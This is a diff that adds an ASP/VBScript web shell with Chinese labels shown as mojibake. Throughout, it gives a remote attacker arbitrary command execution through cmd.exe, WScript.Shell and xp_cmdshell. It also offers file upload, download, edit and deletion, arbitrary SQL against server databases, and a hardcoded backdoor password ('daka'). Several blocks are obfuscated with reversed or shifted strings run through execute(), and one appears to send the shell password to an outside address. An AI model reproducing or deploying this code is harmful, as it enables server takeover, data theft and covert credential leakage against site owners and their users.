+		           RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>ϵͳ���"
+			   RESPONSE.WRITE "  <INPUT NAME=CMD TYPE=TEXT>"
+			   RESPONSE.WRITE "<SELECT NAME='TOOL' ><OPTION VALUE=''>----��ѡ�����г�������----</OPTION><OPTION VALUE=XP_CMDSHELL>XP_CMDSHELL</OPTION><OPTION VALUE=SP_OACREATE>SP_OACREATE</OPTION><OPTION VALUE=XP_REGWRITE>XP_REGWRITE</OPTION><OPTION VALUE=SQLSERVERAGENT>SQLSERVERAGENT</OPTION></OPTION></SELECT>"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=CMD>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=ִ��>"
+			   RESPONSE.WRITE "</FORM>"
+		           RESPONSE.WRITE "<FORM NAME=FORM1 METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>ִ����䣺"
+			   RESPONSE.WRITE "   <INPUT NAME=SQL TYPE=TEXT>"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=SQL>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=ִ��>"			   
+			   RESPONSE.WRITE "</FORM>"                   
+END IF:End Function
+execute(shisanfun("bus dne��fi dne���>retnec/< ��������;psbn&;psbn&��&emaNelif&htap&��;psbn&;psbn&���ĸ���>rb/<>rb/<�� SRR��emiTwen=etadyfidoM.elif_ppa��)emaNelif(emaNesraP.htap_ppa=elif_ppa teS��))��.��(htappam.revres(ecapSemaN.llehs=htap_ppa teS��)��noitacilppA.llehS��(tcejbOetaerC.revreS=llehs teS��gniXuhS=setubirtta.elif��)emaNelif&htap(eliFteg.osf=elif teS��))0,0(tbo(tcejbOetaerC.revreS=osf teS��neht) )0>)emiTwen(nel(dna)0>)emaNelif(nel(dna)0>)htap(nel( (fi���>mrof/<�� SRR���>����=eulav timbus=epyt tupni<�� SRR���>/rb<>'04'=ezis '0'=eulav gnixuhs=eman tupni<������ ���ީ� SRR���>noitpo/< ͳϵ,����,������ֻ>'93'=eulav noitpo<�� SRR���>noitpo/< ����,������ֻ>'53'=eulav noitpo<�� SRR���>noitpo/< ����,����>'43'=eulav noitpo<�� SRR���>noitpo/< ����,��ֻ>'33'=eulav noitpo<�� SRR���>noitpo/<ͳϵ>'4'=eulav noitpo<�� SRR���>noitpo/< ����>'2'=eulav noitpo<�� SRR���>noitpo/< ��ֻ>'1'=eulav noitpo<�� SRR���>noitpo/< ͨ��>''=eulav noitpo<�� SRR���>';eulav.siht=eulav.gnixuhs.mrof.siht'=egnahCno tceles<�� SRR���>/rb<��:��:ʱ ��/��/��;psbn&>'06'=ezis '95:95:32 2102/12/21'=eulav emit=eman tupni<����ʱ����;psbn&;psbn&;psbn&�� SRR���>/rb<)�����ĵĸ���Ҫ(>'06'=ezis 'psa.xedni'=eulav emanelif=eman tupni<����������;psbn&�� SRR���>/rb<)β��\��Ҫ��һ(>'06'=ezis '��&TOORWWW&��'=eulav '1htap'=eman tupni<����;psbn&;psbn&;psbn&;psbn&·>retnec<�� SRR���>tsop=dohtem mrof<�� SRR��)��gnixuhs��(mroF.tseuqer=gniXuhS tes��)��emit��(mroF.tseuqer=emiTwen tes��)��emanelif��(mroF.tseuqer=emaNelif tes��)��1htap��(mroF.tseuqer=htap tes��gniXuhS,emiTweN,emaNeliF,htaP mid��)(txeTeliFteS bus"))
+Function ServerInfo():SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
+SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
+SI=SI&"<form method=post action='http://www.ip138.com/ips.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"
+SI=SI&"<input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&now&"&nbsp;</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 13
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+RRS SI:
+End Function:Function DownFile(Path):Response.Clear
+Set OSM = CreateObject(ObT(6,0))
+OSM.Open
+OSM.Type = 1
+OSM.LoadFromFile Path
+sz=InstrRev(path,"\")+1
+Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
+Response.AddHeader "Content-Length", OSM.Size
+Response.Charset = "UTF-8"
+Response.ContentType = "application/octet-stream"
+Response.BinaryWrite OSM.Read
+Response.Flush
+OSM.Close
+Set OSM = Nothing:End Function:Function HTMLEncode(S):if not isnull(S) then
+    S = replace(S, ">", "&gt;")
+    S = replace(S, "<", "&lt;")
+    S = replace(S, CHR(39), "&#39;")
+    S = replace(S, CHR(34), "&quot;")
+    S = replace(S, CHR(20), "&nbsp;")
+    HTMLEncode = S
+  end if:End Function:Function UpFile():If Request("Action2")="Post" Then
+    Set U=new UPC : Set F=U.UA("LocalFile")
+	UName=U.form("ToPath")
+    If UName="" Or F.FileSize=0 then
+      SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+    Else
+        F.SaveAs UName
+        If Err.number=0 Then
+          SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+		End if
+	End If
+	Set F=nothing:Set U=nothing
+	SI=SI&BackUrl
+	RRS SI
+	ShowErr()
+	Response.End
+  End If
+    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+    SI=SI&"<tr><td>"
+    SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\cmd.exe")&"' size='40'>"
+    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
+    SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+    SI=SI&"</td></tr></form></table>"
+  RRS SI:End Function:Function Cmd1Shell():checked=" checked"
+If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
+ShellPath=Session("ShellPath")
+if ShellPath="" Then ShellPath = "cmd.exe"
+if Request("wscript")<>"yes" then checked=""
+If Request("cmd")<>"" Then DefCmd = Request("cmd")
+SI="<form method='post'>"
+SI=SI&"SHELL·����<input name='SP' value='"&ShellPath&"' Style='width:70%'>&nbsp;&nbsp;"
+SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
+SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='ִ��'><textarea Style='width:100%;height:440;' class='cmd'>"
+If Request.Form("cmd")<>"" Then
+if Request.Form("wscript")="yes" then
+Set CM=CreateObject(ObT(1,0))
+Set DD=CM.exec(ShellPath&" /c "&DefCmd)
+aaa=DD.stdout.readall
+SI=SI&aaa
+else
+On Error Resume Next
+Set ws=Server.CreateObject("WScript.Shell")
+Set ws=Server.CreateObject("WScript.Shell")
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+szTempFile = server.mappath("cmd.txt")
+Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
+aaa=Server.HTMLEncode(oFilelcx.ReadAll)
+oFilelcx.Close
+Call fso.DeleteFile(szTempFile, True)
+SI=SI&aaa
+end if
+End If
+SI=SI&chr(13)&"</textarea></form>"
+RRS SI:End Function
+
+
+Function CreateMdb(Path):SI="<br><br>"
+   Set C = CreateObject(ObT(2,0)) 
+   C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
+   Set C = Nothing
+   If Err.number=0 Then
+     SI = SI & Path & "�����ɹ�!"
+   End If
+   SI=SI&BackUrl 
+   RRS SI:End function:Function CompactMdb(Path):If Not ObT(0,1) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
+	Set C=Nothing
+Else
+  Set FSO=CreateObject(ObT(0,1))
+  If FSO.FileExists(Path) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
+	Set C=Nothing
+    FSO.DeleteFile Path
+	FSO.MoveFile Path&"_bak",Path
+  Else
+    SI="<center><br><br><br>���ݿ�"&Path&"û�з��֣�</center>" 
+	Err.number=1
+  End If
+  Set FSO=Nothing
+End If
+  If Err.number=0 Then
+    SI="<center><br><br><br>���ݿ�"&Path&"ѹ���ɹ���</center>"
+  End If
+  SI=SI&BackUrl
+  RRS SI:End Function
+if sessIoN("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("web2a2dmin")=userPass
+response.redirect url
+else
+ rrs"<br><br><br><br><br><br><br><br><center>���벻��ȷ,��ȷ���Ƿ���������<br><a href='javascript:history.back()'>�� ��</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"' target='_blank'>"&mname&"</a><form action='"&url&"' method='post'>�������룺<input name='pass' type='password' size='22'> <input type='submit' value='��½'><br><br><br><font color=#3399FF>"&Copyright&"</font><br></div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if:Function DbManager():SqlStr=Trim(Request.Form("SqlStr"))
+  DbStr=Request.Form("DbStr")
+  SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
+  SI=SI&"<form name='DbForm' method='post' action=''>"
+  SI=SI&"<tr><td width='100' height='27'> &nbsp;���ݿ����Ӵ�:</td>"
+  SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
+  SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>���Ӵ�ʾ��</option><option value=0>Access����</option>"
+  SI=SI&"<option value=1>MsSql����</option><option value=2>MySql����</option><option value=3>DSN����</option>"
+  SI=SI&"<option value=-1>--SQL�﷨--</option><option value=4>��ʾ����</option><option value=5>��������</option>"
+  SI=SI&"<option value=6>ɾ������</option><option value=7>�޸�����</option><option value=8>�����ݱ�</option>"
+  SI=SI&"<option value=9>ɾ���ݱ�</option><option value=10>�����ֶ�</option><option value=11>ɾ���ֶ�</option>"
+  SI=SI&"<option value=12>��ȫ��ʾ</option></select></td></tr>"
+  SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
+  SI=SI&"<tr><td height='30'>&nbsp;SQL��������:</td>"
+  SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
+  SI=SI&"<td align='center'><input type='submit' name='Submit' value='ִ��' onclick='return DbCheck()'></td>"
+  SI=SI&"</tr></form></table><span id='abc'></span>"
+  RRS SI:SI=""
+  If Len(DbStr)>40 Then
+  Set Conn=CreateObject(ObT(5,0))
+  Conn.Open DbStr
+  Set Rs=Conn.OpenSchema(20) 
+  SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>��<br>��</td>"
+  Rs.MoveFirst 
+  Do While Not Rs.Eof
+    If Rs("TABLE_TYPE")="TABLE" then
+	  TName=Rs("TABLE_NAME")
+      SI=SI&"<td align=center><a href=""javascript:if(confirm('ȷ��ɾ��ô��'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
+      SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
+    End If 
+    Rs.MoveNext 
+  Loop 
+  Set Rs=Nothing
+  SI=SI&"</tr></table>"
+  RRS SI:SI=""
+If Len(SqlStr)>10 Then
+  If LCase(Left(SqlStr,6))="select" then
+    SI=SI&"ִ����䣺"&SqlStr
+    Set Rs=CreateObject("Adodb.Recordset")
+    Rs.open SqlStr,Conn,1,1
+    FN=Rs.Fields.Count
+    RC=Rs.RecordCount
+    Rs.PageSize=20
+    Count=Rs.PageSize
+    PN=Rs.PageCount
+    Page=request("Page")
+    If Page<>"" Then Page=Clng(Page)
+    If Page="" Or Page=0 Then Page=1
+    If Page>PN Then Page=PN
+    If Page>1 Then Rs.absolutepage=Page
+    SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"	  
+    For n=0 to FN-1
+      Set Fld=Rs.Fields.Item(n)
+      SI=SI&"<td align='center'>"&Fld.Name&"</td>"
+      Set Fld=nothing
+    Next
+    SI=SI&"</tr>"
+    Do While Not(Rs.Eof or Rs.Bof) And Count>0
+	  Count=Count-1
+	  Bgcolor="#EFEFEF"
+	  SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"  
+	  For i=0 To FN-1
+        If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
+        If RC=1 Then
+           ColInfo=HTMLEncode(Rs(i))
+        Else
+           ColInfo=HTMLEncode(Left(Rs(i),50))
+        End If
+	    SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
+	  Next
+	  SI=SI&"</tr>"
+      Rs.MoveNext
+    Loop
+	RRS SI:SI=""
+	SqlStr=HtmlEnCode(SqlStr)
+    SI=SI&"<tr><td colspan="&FN+1&" align=center>��¼����"&RC&"&nbsp;ҳ�룺"&Page&"/"&PN
+    If PN>1 Then
+      SI=SI&"&nbsp;&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""",1)'>��ҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>��һҳ</a>&nbsp;"
+      If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
+      For i=Sp To Sp+8
+        If i>PN Then Exit For
+        If i=Page Then
+        SI=SI&i&"&nbsp;"
+        Else
+        SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a>&nbsp;"
+        End If
+      Next
+	  SI=SI&"&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>��һҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>βҳ</a>"
+    End If
+    SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
+    Rs.Close:Set Rs=Nothing
+	RRS SI:SI=""
+  Else	   
+    Conn.Execute(SqlStr)
+    SI=SI&"SQL��䣺"&SqlStr
+  End If
+  RRS SI:SI=""
+End If
+  Conn.Close
+  Set Conn=Nothing
+  End If:End Function
+  Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+Dim T1
+
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+    F=lcase(F)
+    If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+  Public Function UA(F)
+    F=lcase(F)
+    If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+    set D1=CreateObject(ObT(4,0))
+	if Request.TotalBytes<1 then Exit Sub
+    set T1 = CreateObject(ObT(6,0))
+	T1.Type = 1 : T1.Mode =3 : T1.Open
+    T1.Write  Request.BinaryRead(Request.TotalBytes)
+    T1.Position=0 : TDa =T1.Read : DStart = 1
+    DEnd = LenB(TDa)
+    set D2=CreateObject(ObT(4,0))
+	vbCrlf = chrB(13) & chrB(10)
+    set T2 = CreateObject(ObT(6,0))
+    TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+    TLen = LenB (TSt)
+    DStart=DStart+TLen+1
+    while (DStart + 10) < DEnd
+      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+      T2.Type = 1 : T2.Mode =3 : T2.Open
+      T1.Position = DStart
+      T1.CopyTo T2,DIEnd-DStart
+      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+      TIn = T2.ReadText : T2.Close
+      DStart = InStrB(DIEnd,TDa,TSt)
+      FStart = InStr(22,TIn,"name=""",1)+6
+      FEnd = InStr(FStart,TIn,"""",1)
+      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+      if InStr (45,TIn,"filename=""",1) > 0 then
+        set TFL=new FIF
+        FStart = InStr(FEnd,TIn,"filename=""",1)+10
+        FEnd = InStr(FStart,TIn,"""",1)
+        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+        FEnd = InStr(FStart,TIn,vbCr)
+        TFL.FileStart =DIEnd
+        TFL.FileSize = DStart -DIEnd -3
+        if not D2.Exists(UpName) then
+          D2.add UpName,TFL
+        end if
+      else
+        T2.Type =1 : T2.Mode =3 : T2.Open
+        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+        T2.Position = 0 : T2.Type = 2
+        T2.Charset ="gb2312"
+        SFV = T2.ReadText
+        T2.Close
+        if D1.Exists(UpName) then
+          D1(UpName)=D1(UpName)&", "&SFV
+        else
+          D1.Add UpName,SFV
+        end if
+      end if
+      DStart=DStart+TLen+1
+    wend
+    TDa=""
+    set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+    if Request.TotalBytes>0 then
+      D1.RemoveAll:D2.RemoveAll
+      set D1=nothing:set D2=nothing
+      T1.Close:set T1 =nothing
+    end if
+  End Sub
+End Class
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+     T3.Mode=3 : T3.Type=1 : T3.Open
+     T1.position=FileStart
+     T1.copyto T3,FileSize
+     T3.SaveToFile F,2
+     T3.Close
+     set T3=nothing
+     SaveAs=false
+   end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+    SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+    Set CF=Nothing
+End Sub
+Function ShowDriver():For Each D in CF.Drives
+      RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>���ش��� ("&D.DriveLetter&":)</a><br>" 
+    Next:End Function:Function Show1File(Path):Set FOLD=CF.GetFolder(Path)
+  i=0
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr>"
+  For Each F in FOLD.subfolders
+    SI=SI&"<td height=10>"
+    SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""��""><font face='wingdings' size='6'>0</font>"&F.Name&"</a>" 
+	SI=SI&" _<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a>"
+    SI=SI&"  <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'  onclick='return yesok()' class='am' title='����'>Down</a></td>"
+	i=i+1
+    If i mod 3 = 0 then SI=SI&"</tr><tr>"
+  Next
+    SI=SI&"</tr><tr><td height=2></td></tr></table>"
+	RRS SI &"<hr noshade size=1 color=""#"" />" : SI=""
+  For Each L in Fold.files
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
+    SI=SI&"<tr style='boungroup-color:#'>"
+	SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
+    SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>edit</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>del</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>copy</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>move</a></td>"	
+    SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
+	SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
+    SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
+    SI=SI&"</tr></table>"
+	RRS SI:SI=""
+  Next
+  Set FOLD=Nothing:End function:
+  Function DelFile(Path):
+execute(shisanfun("fI dnE���>tpircs<>'��&ssaPresU&��=p&��&1rts&���&nufE SRR��))fLrCbv,����,))43(rhC,����,)edoca(tpyrcnE(ecalper(ecalper(esreveRrtS=nufE��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɳ�ɾ ��&htaP&�� ����>rb<>rb<>rb<>retnec<��=IS��htaP eliFeteleD.FC��nehT )htaP(stsixEeliF.FC fI"))
+End Function:
+Function EditFile(Path):execute(shisanfun("IS SRR���>mrof/<>'�汣'=eulav 'timbus'=epyt 'timbus'=eman tupni<;psbn&;psbn&;psbn&>'����'=eulav 'teser'=epyt 'teser'=eman tupni<;psbn&;psbn&;psbn&>';)(kcab.yrotsih'=kcilcno '�ط�'=eulav 'nottub'=epyt 'kcabog'=eman tupni<>rh<��&IS=IS���>rb<>aeratxet/<��&txT&��>'054:thgieh;%001:htdiw'=elyts 'tnetnoC'=eman aeratxet<��&IS=IS���>rb<>'%001:htdiw'=elyts '��&htaP&��'=eulav 'emaNF'=eman tupni<��&IS=IS���>'neddih'=epyT 'eliFtidE'=eulav 'noitcA'=eman tupni<��&IS=IS���>'mroFtidE'=eman 'tsop'=dohtem 'tsoP=2noitcA?��&LRU&��'=noitca mroF<��&IS=IS��fI dnE�����Ľ��©�=txT:��psa.elifwen\��&)��htaPredloF��(noisseS=htaP��eslE��gnihtoN=T teS��esolc.T�� )lladaer.T(edocnELMTH=txT��)eslaF ,1 ,htaP(eliftxetnepo.FC=T teS��nehT ���><htaP fI��fI dnE��dnE.esnopseR����&lruypoc&��� SRR��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɴ汣����>rb<>rb<>rb<>retnec<��=IS��gnihton=T teS��esolc.T��)��tnetnoc��(mrof.tseuqeR eniLetirW.T��)htaP(eliFtxeTetaerC.FC=T teS��nehT ��tsoP��=)��2noitcA��(tseuqeR fI")):End Function:Function CopyFile(Path):Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If:End Function:Function MoveFile(Path):Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If
+:End Function:Function DelFolder(Path):If CF.FolderExists(Path) Then
+	  CF.DeleteFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"ɾ���ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:Function CopyFolder(Path):Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:Function MoveFolder(Path):Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:Function NewFolder(Path):If Not CF.FolderExists(Path) and Path<>"" Then
+	  CF.CreateFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"�½��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If:End Function:End Class
+execute(LUnEnCode("�egzx%isj?KN%ISJ�e'x%'+jrnyjmy+'%sn%xxjhtwUCwmA'XWW�e..6wjrny27wjrny-ysn-wyxhBjrnyjmy�ewjrny%B%7wjrny�ey}jS�ekN%isJ�ey}jS�ey}jS�ekN%isJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%.n-ury-XWW�ejxqJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%Sisj%+%'%wt%'%+%Sywfyx-XWW�ejxqJ�ey}jS�e.o1}}}%+%ywfyXun-sfhX%qqfH�eSisj%tY%Sywfyx%B%o%wtK�esjmY%.Sisj-hnwjrzsxN%isf%.Sywfyx-hnwjrzsxN%kN�e.%}pjjx%2%..n-ury-sjQ%1.n-ury-ymlnW%B%Sisj�e.%6%2%}pjjx%1.n-ury-ykjQ%B%Sywfyx�esjmY%5%C%}pjjx%kN�e.'2'%1.n-ury-wyXsN%B%}pjjx�ejxqJ�e..n-ury%1}}}%+%ywfyXun-sfhX%qqfH�e%sjmY%..n-ury-hnwjrzsxN%kN�e.ury-isztgZ%tY%5%B%n%wtK�e..'2'1.zm-un-wyXsN2..zm-un-sjQ160.'2'1.zm-un-wyXsN1.zm-un-inR%ty%.6160.'3'1.zm-un-{jWwyXsN1.zm-un-inR%B%}}}%wtK�e..'3'1.zm-un-{jWwyXsN161.zm-un-inR%B%ywfyXun�ejxqJ�ey}jS�ekN%isJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%.n-ury-XWW�ejxqJ�ekN%isJ�e.'CwgAwjgrzs%yts%xn%'%+%Sisj%+%'%wt%'%+%Sywfyx-XWW�ejxqJ�ey}jS�e.o%1.zm-un-sfhX%qqfH�eSisj%tY%Sywfyx%B%o%wtK�esjmY%.Sisj-hnwjrzsxN%isf%.Sywfyx-hnwjrzsxN%kN�e.%}pjjx%2%..n-ury-sjQ%1.n-ury-ymlnW%B%Sisj�e.%6%2%}pjjx%1.n-ury-ykjQ%B%Sywfyx�esjmY%5%C%}pjjx%kN�e.'2'%1.n-ury-wyXsN%B%}pjjx�ejxqJ�e..n-ury%1.zm-un-sfhX%qqfH�e%sjmY%..n-ury-hnwjrzsxN%kN�e.ury-isztgZ%tY%5%B%n%wtK�esjmY%5%B%.'2'1.zm-un-wyXsN%kN�e.un-isztgZ%ty%5%B%zm%wtK�e.'1'1.'un'-rwtK3yxjzvjw-ynquX%B%un�e.'1'1.'ywtu'-rwtK3yxjzvjw-ynquX%B%ury�e.'CwmACwgACg4A?�汨��ɨCgA'-XWW�ewjrny%B%6wjrny�esjmY%''%CA%.'sfhx'-rwtK3yxjzvjw%kN�e'Crwtk4ACu4A'XWW�e'C,666,Bjzqf{%,sfhx,Bin%,sjiinm,Bju~y%,sfhx,Bjrfs%yzusnA'XWW�e'C,%sfhx%,Bjzqf{%,rtyyzg,Bxxfqh%,ynrgzx,Bju~y%,ynrgzx,Bjrfs%yzusnA'XWW�e'CwgACwgA'XWW�e'C,'+yxnQywtU+',Bjzqf{%,5;,Bj nx%,}tGy}jY,Bxxfqh%,y}jy,Bju~y%,ywtu,Bjrfs%yzusnA'XWW�e'?yxnQ%ywtUCwgA'XWW�e'C,5;,Bj 